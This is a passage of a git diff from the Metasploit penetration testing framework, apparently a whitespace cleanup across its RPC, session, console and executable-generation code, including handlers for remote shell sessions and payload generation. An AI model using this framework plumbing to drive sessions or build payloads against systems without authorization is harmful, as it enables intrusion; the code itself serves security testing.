'failed' } end - - if (not @framework.db.connect(opts)) + + if (not @framework.db.connect(opts)) return { :result => 'failed' } end return { :result => 'success' } - + end def status(token) @@ -1323,19 +1323,19 @@ public return {:driver => 'None' } end cdb = "" - if ActiveRecord::Base.connected? and ActiveRecord::Base.connection.active? - if ActiveRecord::Base.connection.respond_to? :current_database - cdb = ActiveRecord::Base.connection.current_database - else - cdb = ActiveRecord::Base.connection.instance_variable_get(:@config)[:database] - end - return {:driver => @framework.db.driver.to_s , :db => cdb } + if ActiveRecord::Base.connected? and ActiveRecord::Base.connection.active? + if ActiveRecord::Base.connection.respond_to? :current_database + cdb = ActiveRecord::Base.connection.current_database + else + cdb = ActiveRecord::Base.connection.instance_variable_get(:@config)[:database] + end + return {:driver => @framework.db.driver.to_s , :db => cdb } else return {:driver => @framework.db.driver.to_s} end return {:driver => 'None' } end - + def disconnect(token) authenticate(token) if (@framework.db) diff --git a/lib/msf/core/rpc/job.rb b/lib/msf/core/rpc/job.rb index 2d0cb90de4..ce3250f809 100644 --- a/lib/msf/core/rpc/job.rb +++ b/lib/msf/core/rpc/job.rb @@ -7,11 +7,11 @@ class Job < Base res = {} res['jobs'] = {} @framework.jobs.each do |j| - res['jobs'][j[0]] = j[1].name + res['jobs'][j[0]] = j[1].name end res end - + def stop(token,jid) authenticate(token) obj = @framework.jobs[jid.to_s] @@ -33,7 +33,7 @@ class Job < Base "name" => obj.name, "start_time" => obj.start_time.to_i } - if obj.ctx && obj.ctx[0] + if obj.ctx && obj.ctx[0] if obj.ctx[0].respond_to?(:get_resource) info['uripath'] = obj.ctx[0].get_resource end diff --git a/lib/msf/core/rpc/module.rb b/lib/msf/core/rpc/module.rb index 8c74afab9d..8c5fe208e5 100644 --- a/lib/msf/core/rpc/module.rb +++ b/lib/msf/core/rpc/module.rb @@ -216,7 +216,7 @@ class Module < Base :template_path => options['exedir'] } - # If we were given addshellcode for a win32 payload, + # If we were given addshellcode for a win32 payload, # create a double-payload; one running in one thread, one running in the other if options['addshellcode'] buf = Msf::Util::EXE.win32_rwx_exec_thread(buf,0,'end') diff --git a/lib/msf/core/rpc/plugin.rb b/lib/msf/core/rpc/plugin.rb index d9f6f76571..0c09eba1ea 100644 --- a/lib/msf/core/rpc/plugin.rb +++ b/lib/msf/core/rpc/plugin.rb @@ -32,7 +32,7 @@ class Plugin < Base elog("Error loading plugin #{path}: #{e}\n\n#{e.backtrace.join("\n")}", src = 'core', level = 0, from = caller) return { "result" => "failure" } end - + end def unload(token,name) @@ -57,7 +57,7 @@ class Plugin < Base end ret end - + end end end diff --git a/lib/msf/core/rpc/service.rb b/lib/msf/core/rpc/service.rb index 01c1fb0aa5..7647d677cb 100644 --- a/lib/msf/core/rpc/service.rb +++ b/lib/msf/core/rpc/service.rb @@ -9,25 +9,25 @@ module RPC module MonkeyPatcher def initialize(*args) - + # Enable Bigint processing (required for big file sizes,etc) if XMLRPC::Config.const_defined?(:ENABLE_BIGINT) XMLRPC::Config.send(:remove_const, :ENABLE_BIGINT) XMLRPC::Config.const_set(:ENABLE_BIGINT, true) end - + # Enable nils in requests if XMLRPC::Config.const_defined?(:ENABLE_NIL_CREATE) XMLRPC::Config.send(:remove_const, :ENABLE_NIL_CREATE) XMLRPC::Config.const_set(:ENABLE_NIL_CREATE, true) end - + # Enable nils in replies if XMLRPC::Config.const_defined?(:ENABLE_NIL_PARSER) XMLRPC::Config.send(:remove_const, :ENABLE_NIL_PARSER) - XMLRPC::Config.const_set(:ENABLE_NIL_PARSER, true) + XMLRPC::Config.const_set(:ENABLE_NIL_PARSER, true) end - + super(*args) end end @@ -35,14 +35,14 @@ end class Service < ::XMLRPC::BasicServer include MonkeyPatcher - + attr_accessor :service, :state, :on_input, :on_output, :on_error attr_accessor :dispatcher_timeout def initialize(srvhost, srvport, ssl=false, cert=nil, ckey=nil) - + self.dispatcher_timeout = 0 - + self.service = Rex::Socket::TcpServer.create( 'LocalHost' => srvhost, 'LocalPort' => srvport, @@ -52,7 +52,7 @@ class Service < ::XMLRPC::BasicServer self.service.on_client_connect_proc = Proc.new { |client| on_client_connect(client) } - self.service.on_client_data_proc = Proc.new { |client| + self.service.on_client_data_proc = Proc.new { |client| begin Timeout.timeout(self.dispatcher_timeout) do on_client_data(client) @@ -143,7 +143,7 @@ end class WebService < ::XMLRPC::BasicServer include MonkeyPatcher - + attr_accessor :service, :state, :srvhost, :srvport, :uri diff --git a/lib/msf/core/rpc/session.rb b/lib/msf/core/rpc/session.rb index 668104f3ac..7dac89222c 100644 --- a/lib/msf/core/rpc/session.rb +++ b/lib/msf/core/rpc/session.rb @@ -50,7 +50,7 @@ class Session < Base # session possible, regardless of position in the stream) def shell_read(token, sid, ptr=nil) _valid_session(token,sid,"shell") - # @session_sequence tracks the pointer into the ring buffer + # @session_sequence tracks the pointer into the ring buffer # data of sessions (by sid) in order to emulate the old behavior # of shell_read @session_sequence ||= {} @@ -96,7 +96,7 @@ class Session < Base rescue ::Exception => e raise ::XMLRPC::FaultException.new(500, "session disconnected: #{e.class} #{e}") end - end + end def ring_put(token, sid, data) authenticate(token) @@ -113,7 +113,7 @@ class Session < Base def ring_last(token, sid) authenticate(token) s = _valid_session(token,sid,"ring") - { "seq" => s.ring.last_sequence.to_s } + { "seq" => s.ring.last_sequence.to_s } end def ring_clear(token, sid) @@ -138,7 +138,7 @@ class Session < Base end buff = Rex::Text.decode_base64(data) - + interacting = false s.channels.each_value do |ch| interacting ||= ch.respond_to?('interacting') && ch.interacting @@ -207,7 +207,7 @@ class Session < Base end ret end - + private def _find_module(mtype,mname) diff --git a/lib/msf/core/rpc/v10/constants.rb b/lib/msf/core/rpc/v10/constants.rb index 8e5f239009..6aab513f07 100644 --- a/lib/msf/core/rpc/v10/constants.rb +++ b/lib/msf/core/rpc/v10/constants.rb @@ -6,7 +6,7 @@ API_VERSION = "1.0" class Exception < RuntimeError attr_accessor :code, :message - + def initialize(code, message) self.code = code self.message = message @@ -16,14 +16,14 @@ end class ServerException < RuntimeError attr_accessor :code, :error_message, :error_class, :error_backtrace - + def initialize(code, error_message, error_class, error_backtrace) self.code = code self.error_message = error_message self.error_class = error_class self.error_backtrace = error_backtrace end - + def to_s "#{self.error_class} #{self.error_message} #{self.error_backtrace}" end diff --git a/lib/msf/core/rpc/v10/rpc_auth.rb b/lib/msf/core/rpc/v10/rpc_auth.rb index 4b600d34de..1eca083291 100644 --- a/lib/msf/core/rpc/v10/rpc_auth.rb +++ b/lib/msf/core/rpc/v10/rpc_auth.rb @@ -22,12 +22,12 @@ end end fail = db_validate_auth(user,pass) if fail - + if fail # Introduce a random delay in the response to annoy brute forcers delay = [ ( rand(3000) / 1000.0 ), 0.50 ].max ::IO.select(nil, nil, nil, delay) - + # Send back a 401 denied error error(401, "Login Failed") end diff --git a/lib/msf/core/rpc/v10/rpc_base.rb b/lib/msf/core/rpc/v10/rpc_base.rb index ac6f006c5c..2f90631195 100644 --- a/lib/msf/core/rpc/v10/rpc_base.rb +++ b/lib/msf/core/rpc/v10/rpc_base.rb @@ -3,14 +3,14 @@ module RPC class RPC_Base attr_accessor :framework, :service, :tokens, :users - + def initialize(service) self.service = service self.framework = service.framework self.tokens = service.tokens - self.users = service.users + self.users = service.users end - + def error(code, message) raise Msf::RPC::Exception.new(code, message) end diff --git a/lib/msf/core/rpc/v10/rpc_console.rb b/lib/msf/core/rpc/v10/rpc_console.rb index ebd603a3d7..78d1f5a8ea 100644 --- a/lib/msf/core/rpc/v10/rpc_console.rb +++ b/lib/msf/core/rpc/v10/rpc_console.rb @@ -46,7 +46,7 @@ class RPC_Console < RPC_Base "data" => @console_driver.read_console(cid) || '', "prompt" => @console_driver.consoles[cid].prompt || '', "busy" => @console_driver.consoles[cid].busy || false - } + } end def rpc_write(cid, data) @@ -56,20 +56,20 @@ class RPC_Console < RPC_Base end def rpc_tabs(cid, line) - cid = cid.to_s + cid = cid.to_s return { 'result' => 'failure' } if not @console_driver.consoles[cid] { "tabs" => @console_driver.consoles[cid].tab_complete(line) } end def rpc_session_kill(cid) - cid = cid.to_s + cid = cid.to_s return { 'result' => 'failure' } if not @console_driver.consoles[cid] @console_driver.consoles[cid].session_kill { 'result' => 'success' } end def rpc_session_detach(cid) - cid = cid.to_s + cid = cid.to_s return { 'result' => 'failure' } if not @console_driver.consoles[cid] @console_driver.consoles[cid].session_detach { 'result' => 'success' } diff --git a/lib/msf/core/rpc/v10/rpc_core.rb b/lib/msf/core/rpc/v10/rpc_core.rb index 39d857564c..e98783657d 100644 --- a/lib/msf/core/rpc/v10/rpc_core.rb +++ b/lib/msf/core/rpc/v10/rpc_core.rb @@ -4,64 +4,64 @@ class RPC_Core < RPC_Base def rpc_version { - "version" => ::Msf::Framework::Version, + "version" => ::Msf::Framework::Version, "ruby" => "#{RUBY_VERSION} #{RUBY_PLATFORM} #{RUBY_RELEASE_DATE}", - "api" => API_VERSION + "api" => API_VERSION } end - + def rpc_stop self.service.stop end - + def rpc_setg(var, val) framework.datastore[var] = val { "result" => "success" } end - + def rpc_unsetg(var) framework.datastore.delete(var) { "result" => "success" } end - + def rpc_save framework.save_config { "result" => "success" } end - + def rpc_reload_modules framework.modules.reload_modules rpc_module_stats() end - + def rpc_add_module_path(path) framework.modules.add_module_path(path, false) rpc_module_stats() end - + def rpc_module_stats - { + { 'exploits' => framework.stats.num_exploits, 'auxiliary' => framework.stats.num_auxiliary, 'post' => framework.stats.num_post, 'encoders' => framework.stats.num_encoders, 'nops' => framework.stats.num_nops, - 'payloads' => framework.stats.num_payloads + 'payloads' => framework.stats.num_payloads } end - + def rpc_thread_list res = {} framework.threads.each_index do |i| t = framework.threads[i] next if not t - res[i] = { + res[i] = { :status => (t.status || "dead"), :critical => t[:tm_crit] ? true : false, :name => t[:tm_name].to_s, :started => t[:tm_time].to_s - } - end + } + end res end @@ -69,7 +69,7 @@ class RPC_Core < RPC_Base framework.threads.kill(tid.to_i) rescue nil { "result" => "success" } end - + end end end diff --git a/lib/msf/core/rpc/v10/rpc_db.rb b/lib/msf/core/rpc/v10/rpc_db.rb index e904a44808..9da4932529 100644 --- a/lib/msf/core/rpc/v10/rpc_db.rb +++ b/lib/msf/core/rpc/v10/rpc_db.rb @@ -3,12 +3,12 @@ module RPC class RPC_Db < RPC_Base private - def db + def db self.framework.db.active end def find_workspace(wspace = nil) - if(wspace and wspace != "") + if(wspace and wspace != "") return self.framework.db.find_workspace(wspace) || error(500, "Invalid workspace") end self.framework.db.workspace @@ -23,7 +23,7 @@ private end def opts_to_hosts(opts) - wspace = find_workspace(opts[:workspace]) + wspace = find_workspace(opts[:workspace]) hosts = [] if opts[:host] or opts[:address] host = opts[:host] || opts[:address] @@ -42,7 +42,7 @@ private end def opts_to_services(hosts,opts) - wspace = find_workspace(opts[:workspace]) + wspace = find_workspace(opts[:workspace]) services = [] if opts[:host] or opts[:address] or opts[:addresses] return services if hosts.count < 1 @@ -69,7 +69,7 @@ private end return services end - + def db_check error(500, "Database Not Loaded") if not db end @@ -95,7 +95,7 @@ public ret = {} ret[:hosts] = [] - wspace.hosts.all(:conditions => conditions, :order => :address, + wspace.hosts.all(:conditions => conditions, :order => :address, :limit => limit, :offset => offset).each do |h| host = {} host[:created_at] = h.created_at.to_i @@ -164,7 +164,7 @@ public wspace.vulns.all(:include => :service, :conditions => conditions, :limit => limit, :offset => offset).each do |v| vuln = {} reflist = v.refs.map { |r| r.name } - if(v.service) + if(v.service) vuln[:port] = v.service.port vuln[:proto] = v.service.proto else @@ -172,7 +172,7 @@ public vuln[:proto] = nil end vuln[:time] = v.created_at.to_i - vuln[:host] = v.host.address || v.host.address6 || nil + vuln[:host] = v.host.address || v.host.address6 || nil vuln[:name] = v.name vuln[:refs] = reflist.join(',') ret[:vulns] << vuln @@ -252,7 +252,7 @@ public def rpc_get_host(xopts) opts, wspace = init_db_opts_workspace(xopts) - + ret = {} ret[:host] = [] opts = fix_options(xopts) @@ -274,7 +274,7 @@ public host[:info] = h.info.to_s ret[:host] << host end - ret + ret end def rpc_report_host(xopts) @@ -283,7 +283,7 @@ public res = self.framework.db.report_host(opts) return { :result => 'success' } if(res) { :result => 'failed' } - + end def rpc_report_service(xopts) @@ -320,7 +320,7 @@ public services << sret if sret.class == Msf::DBManager::Service services |= sret if sret.class == Array - + services.each do |s| service = {} host = s.host @@ -423,7 +423,7 @@ public service = host.services.find_by_proto_and_port(opts[:proto],opts[:port]) if host.services.count > 0 opts[:service] = service if service end - + res = self.framework.db.report_note(opts) return { :result => 'success' } if(res) { :result => 'failed' } @@ -443,7 +443,7 @@ public ret = {} ret[:notes] = [] - wspace.notes.all(:include => [:host, :service], :conditions => conditions, + wspace.notes.all(:include => [:host, :service], :conditions => conditions, :limit => limit, :offset => offset).each do |n| note = {} note[:time] = n.created_at.to_i @@ -475,7 +475,7 @@ public i.each do |k,v| info[k.to_sym] = v end - ret[:auth_info] << info + ret[:auth_info] << info end ret end @@ -490,7 +490,7 @@ public hosts = [] services = [] vulns = [] - + if opts[:host] or opts[:address] or opts[:addresses] hosts = opts_to_hosts(opts) end @@ -546,10 +546,10 @@ public dent[:proto] = v.service.proto if v.service dent[:name] = v.name deleted << dent - v.destroy + v.destroy end - - return { :result => 'success', :deleted => deleted } + + return { :result => 'success', :deleted => deleted } end def rpc_del_note(xopts) @@ -557,7 +557,7 @@ public hosts = [] services = [] notes = [] - + if opts[:host] or opts[:address] or opts[:addresses] hosts = opts_to_hosts(opts) end @@ -612,10 +612,10 @@ public dent[:proto] = n.service.proto if n.service dent[:ntype] = n.ntype deleted << dent - n.destroy + n.destroy end - - return { :result => 'success', :deleted => deleted } + + return { :result => 'success', :deleted => deleted } end def rpc_del_service(xopts) @@ -658,7 +658,7 @@ public services << sret if sret and sret.class == Msf::DBManager::Service services |= sret if sret and sret.class == Array end - + deleted = [] services.each do |s| dent = {} @@ -666,16 +666,16 @@ public dent[:port] = s.port dent[:proto] = s.proto deleted << dent - s.destroy + s.destroy end - - return { :result => 'success', :deleted => deleted } + + return { :result => 'success', :deleted => deleted } end def rpc_del_host(xopts) db_check opts = fix_options(xopts) - wspace = find_workspace(opts[:workspace]) + wspace = find_workspace(opts[:workspace]) hosts = [] if opts[:host] or opts[:address] host = opts[:host] || opts[:address] @@ -693,10 +693,10 @@ public deleted = [] hosts.each do |h| deleted << h.address.to_s - h.destroy + h.destroy end - - return { :result => 'success', :deleted => deleted } + + return { :result => 'success', :deleted => deleted } end def rpc_report_vuln(xopts) @@ -722,14 +722,14 @@ public event[:created_at] = e.created_at.to_i event[:updated_at] = e.updated_at.to_i event[:name] = e.name - event[:critical] = e.critical if(e.critical) - event[:username] = e.username if(e.username) + event[:critical] = e.critical if(e.critical) + event[:username] = e.username if(e.username) event[:info] = e.info ret[:events] << event end ret end - + def rpc_report_event(xopts) opts, wspace = init_db_opts_workspace(xopts) res = self.framework.db.report_event(opts) @@ -778,7 +778,7 @@ public return { :result => 'success' } if res { :result => 'failed' } end - + #right now workspace is the only option supported def rpc_creds(xopts) opts, wspace = init_db_opts_workspace(xopts) @@ -787,7 +787,7 @@ public ret = {} ret[:creds] = [] - DBManager::Cred.find(:all, :include => {:service => :host}, :conditions => ["hosts.workspace_id = ?", + DBManager::Cred.find(:all, :include => {:service => :host}, :conditions => ["hosts.workspace_id = ?", framework.db.workspace.id ], :limit => limit, :offset => offset).each do |c| cred = {} cred[:host] = c.service.host.address || c.service.host.address6 if(c.service.host) @@ -803,7 +803,7 @@ public end ret end - + def rpc_import_data(xopts) opts, wspace = init_db_opts_workspace(xopts) self.framework.db.import(opts) @@ -827,7 +827,7 @@ public return ret if sret == nil services << sret if sret.class == Msf::DBManager::Service services |= sret if sret.class == Array - + services.each do |s| vulns |= s.vulns end @@ -836,7 +836,7 @@ public end return ret if (not vulns) - + vulns.each do |v| vuln= {} host= v.host @@ -852,12 +852,12 @@ public vuln[:refs] = [] v.refs.each do |r| vuln[:refs] << r.name - end + end ret[:vuln] << vuln end ret end - + def rpc_clients(xopts) opts, wspace = init_db_opts_workspace(xopts) limit = opts.delete(:limit) || 100 @@ -888,7 +888,7 @@ public def rpc_del_client(xopts) db_check opts = fix_options(xopts) - wspace = find_workspace(opts[:workspace]) + wspace = find_workspace(opts[:workspace]) hosts = [] clients = [] @@ -900,7 +900,7 @@ public hosts.each do |h| cret = nil - if opts[:ua_name] or opts[:ua_ver] + if opts[:ua_name] or opts[:ua_ver] conditions = {} conditions[:ua_name] = opts[:ua_name] if opts[:ua_name] conditions[:ua_ver] = opts[:ua_ver] if opts[:ua_ver] @@ -919,10 +919,10 @@ public dent[:address] = c.host.address.to_s dent[:ua_string] = c.ua_string deleted << dent - c.destroy + c.destroy end - { :result => 'success', :deleted => deleted } + { :result => 'success', :deleted => deleted } end def rpc_driver(xopts) @@ -954,7 +954,7 @@ public return { :result => 'failed' } end end - + driver = self.framework.db.driver case driver @@ -963,19 +963,19 @@ public else return { :result => 'failed' } end - - if (not self.framework.db.connect(opts)) + + if (not self.framework.db.connect(opts)) return { :result => 'failed' } end return { :result => 'success' } - + end def rpc_status if (not self.framework.db.driver) return {:driver => 'None' } end - + cdb = "" if ActiveRecord::Base.connected? and ActiveRecord::Base.connection.active? if ActiveRecord::Base.connection.respond_to? :current_database @@ -989,7 +989,7 @@ public end {:driver => 'None' } end - + def rpc_disconnect if (self.framework.db) self.framework.db.disconnect() diff --git a/lib/msf/core/rpc/v10/rpc_job.rb b/lib/msf/core/rpc/v10/rpc_job.rb index 80ca4c0c58..7862a81596 100644 --- a/lib/msf/core/rpc/v10/rpc_job.rb +++ b/lib/msf/core/rpc/v10/rpc_job.rb @@ -5,18 +5,18 @@ class RPC_Job < RPC_Base def rpc_list res = {} self.framework.jobs.each do |j| - res[j[0]] = j[1].name + res[j[0]] = j[1].name end res end - + def rpc_stop(jid) obj = self.framework.jobs[jid.to_s] error(500, "Invalid Job") if not obj obj.stop { "result" => "success" } end - + def rpc_info(jid) obj = self.framework.jobs[jid.to_s] error(500, "Invalid Job") if not obj @@ -26,8 +26,8 @@ class RPC_Job < RPC_Base :name => obj.name, :start_time => obj.start_time.to_i } - - if obj.ctx && obj.ctx[0] + + if obj.ctx && obj.ctx[0] if obj.ctx[0].respond_to?(:get_resource) info[:uripath] = obj.ctx[0].get_resource end diff --git a/lib/msf/core/rpc/v10/rpc_module.rb b/lib/msf/core/rpc/v10/rpc_module.rb index 7aedaa64c6..ab44e1e7c1 100644 --- a/lib/msf/core/rpc/v10/rpc_module.rb +++ b/lib/msf/core/rpc/v10/rpc_module.rb @@ -168,7 +168,7 @@ class RPC_Module < RPC_Base if options['platform'] platform = Msf::Module::PlatformList.transform(options['platform']) end - + arch = nil if options['arch'] arch = options['arch'] @@ -185,7 +185,7 @@ class RPC_Module < RPC_Base :template_path => options['exedir'] } - # If we were given addshellcode for a win32 payload, + # If we were given addshellcode for a win32 payload, # create a double-payload; one running in one thread, one running in the other if options['addshellcode'] buf = Msf::Util::EXE.win32_rwx_exec_thread(buf,0,'end') @@ -229,7 +229,7 @@ class RPC_Module < RPC_Base private def _find_module(mtype,mname) - + if mname !~ /^(exploit|payload|nop|encoder|auxiliary|post)\// mname = mtype + "/" + mname end @@ -275,7 +275,7 @@ private "uuid" => mod.uuid } end - + def _run_payload(mod, opts) badchars = opts['BadChars'] || '' fmt = opts['Format'] || 'raw' diff --git a/lib/msf/core/rpc/v10/rpc_plugin.rb b/lib/msf/core/rpc/v10/rpc_plugin.rb index b2139b419c..e5493e2db2 100644 --- a/lib/msf/core/rpc/v10/rpc_plugin.rb +++ b/lib/msf/core/rpc/v10/rpc_plugin.rb @@ -3,7 +3,7 @@ module RPC class RPC_Plugin < RPC_Base def rpc_load(path, xopts = {}) - + opts = {} xopts.each do |k,v| @@ -31,7 +31,7 @@ class RPC_Plugin < RPC_Base elog("Error loading plugin #{path}: #{e}\n\n#{e.backtrace.join("\n")}", src = 'core', level = 0, from = caller) return { "result" => "failure" } end - + end def rpc_unload(name) @@ -54,7 +54,7 @@ class RPC_Plugin < RPC_Base end ret end - + end end end diff --git a/lib/msf/core/rpc/v10/rpc_session.rb b/lib/msf/core/rpc/v10/rpc_session.rb index fb609ac582..6ad8cfe5b3 100644 --- a/lib/msf/core/rpc/v10/rpc_session.rb +++ b/lib/msf/core/rpc/v10/rpc_session.rb @@ -48,7 +48,7 @@ class RPC_Session < RPC_Base # session possible, regardless of position in the stream) def rpc_shell_read( sid, ptr=nil) _valid_session(sid,"shell") - # @session_sequence tracks the pointer into the ring buffer + # @session_sequence tracks the pointer into the ring buffer # data of sessions (by sid) in order to emulate the old behavior # of shell_read @session_sequence ||= {} @@ -93,7 +93,7 @@ class RPC_Session < RPC_Base rescue ::Exception => e error(500, "Session Disconnected: #{e.class} #{e}") end - end + end def rpc_ring_put( sid, data) s = _valid_session(sid,"ring") @@ -107,7 +107,7 @@ class RPC_Session < RPC_Base def rpc_ring_last( sid) s = _valid_session(sid,"ring") - { "seq" => s.ring.last_sequence.to_s } + { "seq" => s.ring.last_sequence.to_s } end def rpc_ring_clear( sid) @@ -193,7 +193,7 @@ class RPC_Session < RPC_Base def rpc_compatible_modules( sid) ret = [] - + mtype = "post" names = self.framework.post.keys.map{ |x| "post/#{x}" } names.each do |mname| @@ -203,7 +203,7 @@ class RPC_Session < RPC_Base end { "modules" => ret } end - + private def _find_module(mtype,mname) @@ -221,7 +221,7 @@ private if(not s) error(500, "Unknown Session ID") end - + if type == "ring" if not s.respond_to?(:ring) error(500, "Session #{s.type} does not support ring operations") diff --git a/lib/msf/core/session/basic.rb b/lib/msf/core/session/basic.rb index e6b877e0b4..369a0f1007 100644 --- a/lib/msf/core/session/basic.rb +++ b/lib/msf/core/session/basic.rb @@ -25,7 +25,7 @@ module Basic def type "basic" end - + protected # diff --git a/lib/msf/core/session/interactive.rb b/lib/msf/core/session/interactive.rb index b808f2fbdd..ac96fe2f28 100644 --- a/lib/msf/core/session/interactive.rb +++ b/lib/msf/core/session/interactive.rb @@ -95,7 +95,7 @@ module Interactive # The remote stream handle. Must inherit from Rex::IO::Stream. # attr_accessor :rstream - + # # The RingBuffer object used to allow concurrent access to this session # diff --git a/lib/msf/core/session/netware_console.rb b/lib/msf/core/session/netware_console.rb index 4fda1de360..8372a2a748 100644 --- a/lib/msf/core/session/netware_console.rb +++ b/lib/msf/core/session/netware_console.rb @@ -4,15 +4,15 @@ module Msf module Sessions ### -# +# # This class provides basic interaction with a command shell on the remote # endpoint. This session is initialized with a stream that will be used # as the pipe for reading and writing the command shell. # ### class NetwareConsole - - # + + # # This interface supports basic interaction. # include Msf::Session::Basic @@ -73,28 +73,28 @@ class NetwareConsole def _stream_read_remote_write_local(stream) buf = stream.get - bsize = 25 * 80 +8 + bsize = 25 * 80 +8 - while buf.length > 0 - data = buf[0, bsize] + while buf.length > 0 + data = buf[0, bsize] - user_output.print("\e[24A") + user_output.print("\e[24A") - for i in 0..24 - user_output.print(data[8+i*80, 80] + "\n") - end + for i in 0..24 + user_output.print(data[8+i*80, 80] + "\n") + end - col = data[4, 2].unpack('v')[0] - line = 25-data[6, 2].unpack('v')[0] - user_output.print("\e[#{line}A") - user_output.print("\e[#{col}C") + col = data[4, 2].unpack('v')[0] + line = 25-data[6, 2].unpack('v')[0] + user_output.print("\e[#{line}A") + user_output.print("\e[#{col}C") - if (buf.length == bsize) - buf = '' - else - buf = buf[bsize, buf.length] - end - end + if (buf.length == bsize) + buf = '' + else + buf = buf[bsize, buf.length] + end + end end end diff --git a/lib/msf/core/session/provider/multi_command_shell.rb b/lib/msf/core/session/provider/multi_command_shell.rb index 4cdde3de9d..1f8369dc67 100644 --- a/lib/msf/core/session/provider/multi_command_shell.rb +++ b/lib/msf/core/session/provider/multi_command_shell.rb @@ -15,7 +15,7 @@ module MultiCommandShell include SingleCommandShell # - # Initializes the default command shell as expected from + # Initializes the default command shell as expected from # SingleCommandShell. # def shell_init() diff --git a/lib/msf/core/task_manager.rb b/lib/msf/core/task_manager.rb index aa5fb13d8e..6c2db60e35 100644 --- a/lib/msf/core/task_manager.rb +++ b/lib/msf/core/task_manager.rb @@ -77,7 +77,7 @@ class TaskManager # # Add a new task to the queue unless we are called - # by the queue thread itself. + # by the queue thread itself. # def queue_task(task) if Thread.current[:task_manager] @@ -128,10 +128,10 @@ class TaskManager retry end end - + # Mark this thread as the task manager self.thread[:task_manager] = true - + # Return the thread object to the caller self.thread end diff --git a/lib/msf/ui/console/command_dispatcher.rb b/lib/msf/ui/console/command_dispatcher.rb index ef9fd3ded5..9fb1741043 100644 --- a/lib/msf/ui/console/command_dispatcher.rb +++ b/lib/msf/ui/console/command_dispatcher.rb @@ -84,9 +84,9 @@ module CommandDispatcher # attr_accessor :driver -end +end end end end - + require 'msf/ui/console/module_command_dispatcher' require 'msf/ui/console/command_dispatcher/core' diff --git a/lib/msf/ui/console/command_dispatcher/db.rb b/lib/msf/ui/console/command_dispatcher/db.rb index 2141745911..941c8acfdb 100644 --- a/lib/msf/ui/console/command_dispatcher/db.rb +++ b/lib/msf/ui/console/command_dispatcher/db.rb @@ -1138,7 +1138,7 @@ class Db save = false if args.include?("save") - save = active? + save = active? args.delete("save") end diff --git a/lib/msf/ui/console/command_dispatcher/nop.rb b/lib/msf/ui/console/command_dispatcher/nop.rb index aa54d1ae7e..9f5d66e113 100644 --- a/lib/msf/ui/console/command_dispatcher/nop.rb +++ b/lib/msf/ui/console/command_dispatcher/nop.rb @@ -55,7 +55,7 @@ class Nop @@generate_opts.parse(args) { |opt, idx, val| case opt when nil - length = val.to_i + length = val.to_i when '-b' badchars = Rex::Text.hex_to_raw(val) when "-c" diff --git a/lib/msf/ui/console/command_dispatcher/payload.rb b/lib/msf/ui/console/command_dispatcher/payload.rb index 2c519ff6ea..dd1430db7e 100644 --- a/lib/msf/ui/console/command_dispatcher/payload.rb +++ b/lib/msf/ui/console/command_dispatcher/payload.rb @@ -40,7 +40,7 @@ class Payload # def commands super.update({ - "generate" => "Generates a payload", + "generate" => "Generates a payload", }) end @@ -68,7 +68,7 @@ class Payload template = nil plat = nil keep = false - + @@generate_opts.parse(args) { |opt, idx, val| case opt when '-b' diff --git a/lib/msf/ui/console/driver.rb b/lib/msf/ui/console/driver.rb index 1c47a7b2d3..25e7701eda 100644 --- a/lib/msf/ui/console/driver.rb +++ b/lib/msf/ui/console/driver.rb @@ -213,60 +213,60 @@ class Driver < Msf::Ui::Driver load_resource(opts['Resource']) end end - + # # Configure a default output path for jUnit XML output # def junit_setup(output_path) output_path = ::File.expand_path(output_path) - + ::FileUtils.mkdir_p(output_path) @junit_output_path = output_path @junit_error_count = 0 print_status("Test Output: #{output_path}") end - + # # Emit a new jUnit XML output file representing an error # def junit_error(tname, ftype, data = nil) - + if not @junit_output_path raise RuntimeError, "No output path, call junit_setup() first" end - + data ||= framework.inspect.to_s - + e = REXML::Element.new("testsuite") - + c = REXML::Element.new("testcase") c.attributes["classname"] = "msfrc" c.attributes["name"] = tname - + f = REXML::Element.new("failure") f.attributes["type"] = ftype - - f.text = data + + f.text = data c << f e << c - - bname = ( ::File.basename(self.active_resource || "msfrpc") + "_" + tname ).gsub(/[^A-Za-z0-9\.\_]/, '') + + bname = ( ::File.basename(self.active_resource || "msfrpc") + "_" + tname ).gsub(/[^A-Za-z0-9\.\_]/, '') bname << "_" + Digest::MD5.hexdigest(ftype) - + fname = ::File.join(@junit_output_path, "#{bname}.xml") cnt = 0 while ::File.exists?( fname ) cnt += 1 fname = ::File.join(@junit_output_path, "#{bname}_#{cnt}.xml") - end - + end + ::File.open(fname, "w") do |fd| fd.write(e.to_s) end - + print_error("Test Error: #{tname} - #{ftype} - #{data}") end - + # # Emit a jUnit XML output file and throw a fatal exception # @@ -275,7 +275,7 @@ class Driver < Msf::Ui::Driver print_error("Exiting") run_single("exit -y") end - + # # Loads configuration that needs to be analyzed before the framework # instance is created. @@ -343,18 +343,18 @@ class Driver < Msf::Ui::Driver path ||= File.join(Msf::Config.config_directory, 'msfconsole.rc') return if not ::File.readable?(path) resource_file = ::File.read(path) - + self.active_resource = resource_file - + # Process ERB directives first - print_status "Processing #{path} for ERB directives." + print_status "Processing #{path} for ERB directives." erb = ERB.new(resource_file) processed_resource = erb.result(binding) lines = processed_resource.each_line.to_a bindings = {} while lines.length > 0 - + line = lines.shift break if not line line.strip! @@ -393,8 +393,8 @@ class Driver < Msf::Ui::Driver run_single(line) end end - - self.active_resource = nil + + self.active_resource = nil end # @@ -481,7 +481,7 @@ class Driver < Msf::Ui::Driver when "loglevel" handle_loglevel(val) if (glob) when "prompt" - update_prompt(val, framework.datastore['PromptChar'] || DefaultPromptChar, true) + update_prompt(val, framework.datastore['PromptChar'] || DefaultPromptChar, true) when "promptchar" update_prompt(framework.datastore['Prompt'], val, true) end @@ -522,7 +522,7 @@ class Driver < Msf::Ui::Driver # The active resource file being processed by the driver # attr_accessor :active_resource - + # # If defanged is true, dangerous functionality, such as exploitation, irb, # and command shell passthru is disabled. In this case, an exception is diff --git a/lib/msf/util/exe.rb b/lib/msf/util/exe.rb index 607ad68a21..d87e00f4ee 100644 --- a/lib/msf/util/exe.rb +++ b/lib/msf/util/exe.rb @@ -127,7 +127,7 @@ require 'digest/sha1' raise RuntimeError, 'NOTE: using the substitution method means no inject support' end - # use + # use return self.to_win32pe_exe_sub(framework, code, opts) end @@ -152,7 +152,7 @@ require 'digest/sha1' cert_entry = pe.hdr.opt['DataDirectory'][4] #if the cert is the only thing past the sections, we can handle. if cert_entry.v['VirtualAddress'] + cert_entry.v['Size'] >= fsize and sections_end >= cert_entry.v['VirtualAddress'] - endjunk = false + endjunk = false end #try to inject code into executable by adding a section without affecting executable behavior @@ -937,7 +937,7 @@ require 